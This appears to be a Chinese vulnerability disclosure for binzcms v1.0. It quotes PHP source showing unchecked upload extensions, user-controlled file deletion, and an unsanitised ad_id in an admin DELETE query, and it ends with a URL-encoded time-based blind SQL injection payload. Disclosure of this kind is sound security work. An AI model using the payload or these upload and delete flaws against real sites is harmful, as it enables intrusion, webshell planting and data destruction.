binzcms_v1.0前台任意文件上传与删除&&后台时间盲注

binzcms_v1.0

下载地址:http://down.admin5.com/php/69689.html

问题文件:文件binzcms/class/FrontHomeClass.php,第133-145行:

private function front_member_img() {

$upload_path = ‘upload/member’;

 

$image_insert = $this->mod_front_upload_img($upload_path);

if($image_insert) {

 

$this->binz_common->front_msg($this->binz_tpl->var_all[‘home_member_edit_top_ok’],0,$link,$this->binz_tpl,true,2);

} else {

 

$this->binz_common->front_msg($this->binz_tpl->var_all[‘home_member_edit_top_false’],0,$link,$this->binz_tpl,true,2);

}

}

跟进mod_front_upload_img函数,第76-96行

public function mod_front_upload_img($path) {

$img_path = ”;

$edit_state = false;

 

if($_FILES[‘usr_portrait’][‘name’] != ”) {

$upload_image = $this->import_class(‘Image’,ROOT_PATH.’/include’);

$upload_image->upload_dir = $path;

$img_path = $upload_image->upload_image($_FILES[‘usr_portrait’],’n’);

$upload_image->create_thump(ROOT_PATH.$img_path,ROOT_PATH.’/’.$path);

if($_POST[‘member_img’] != ”) @unlink(ROOT_PATH.trim($_POST[‘member_img’]));

}

 

if (trim($_POST[‘member_img’]) != ” and $_FILES[‘usr_portrait’][‘name’] == ”) {

$img_path = trim($_POST[‘member_img’]);

}

$edit_state = $this->binz_db->set_update_sql(‘#binz#member’,array(‘member_img’=>$img_path),array(‘field’=>’member_id’,’value’=>$_SESSION[‘member_id’]));

return $edit_state;

}

跟进upload_image函数,第54-91行:

public function upload_image($files,$dir_type=’m’,$image_name=”,$create_thumb=false,$wartermark=’0′) {

$true_path = $this->dir_name_type($dir_type);

if(!is_dir($true_path)) {

if(!@mkdir($true_path,0777)) {

die(“create dir “.$dir_name[$dir_type].” error!”);

exit();

}

}

$image_array = explode(‘.’,$files[‘name’]);

if($image_name == ”) {

$image_name = $true_path.”/”.time().mt_rand().”.”.$image_array[count($image_array)-1];

} else {

$image_name = $true_path.”/”.$image_name.”.”.$image_array[count($image_array)-1];

}

//if(!in_array($files[‘type’],array(‘image/pjpeg’,’image/x-png’,’image/png’,’image/gif’,’image/jpeg’))) {

if(!$this->check_image_type($files[‘type’])){

die(‘image type error!’);

exit();

}

if(!move_uploaded_file($files[‘tmp_name’],$image_name)) {

die(‘upload error!’);

exit();

}

if($wartermark == ‘1’) {

$this->create_watermark($image_name);

}

if($create_thumb) {

$this->create_thump($image_name,$true_path,”,THUMP_IMAGE_WIDTH,THUMP_IMAGE_HEIGHT);

}

return str_replace(ROOT_PATH,”,$image_name);

}

1.1前台任意文件上传和任意文件删除:

未验证上传后缀,可以直接上传任意文件,还判断了文件是否存在,如果存在直接删除

漏洞文件binzcms/admin/model/ModAdminAdClass.php文件,第126-145行:

public function mod_ad_del($ad_id) {

$ad_del = false;

$ad_info = array();

$ad_sql = ”;

$ad_info = $this->mod_ad_info($ad_id);

if($ad_info[‘ad_type’] == ‘ad_image’ or $ad_info[‘ad_type’] == ‘ad_flash’) {

if(strpos(“http”,$ad_info[‘ad_body’]) === false) {

@unlink(ROOT_PATH.$ad_info[‘ad_body’]);

}

}

unset($ad_info);

echo $ad_id;

$del_sql = “DELETE FROM #binz#ad WHERE ad_id=”.$ad_id;

$ad_del = $this->binz_db->one_query($del_sql);

return $ad_del;

跟进调用了mod_ad_del函数的, binzcms/admin/class/AdminAdClass.php,第154-170行:

private function ad_del() {

$this->binz_admin_common->check_admin_power(‘ad_manage’);

 

$del_state = false;

$message = ”;

 

$del_state = $this->mod_ad_del($_GET[‘ad_id’]);

if($del_state) {

$message = $this->binz_tpl->var_all[‘ad_list_del_ok’];

} else {

$message = $this->binz_tpl->var_all[‘ad_list_del_no’];

}

$this->binz_common->admin_msg($message,0,$link,$this->binz_tpl,true,2);

}

ad_id直接接受的$_GET赋值,无过滤,使用时间盲注:

payload:

%20%41%4e%44%20%28%53%45%4c%45%43%54%20%2a%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%28%53%4c%45%45%50%28%35%29%29%29%66%6f%79%6e%29

 

0 条评论
发表一条评论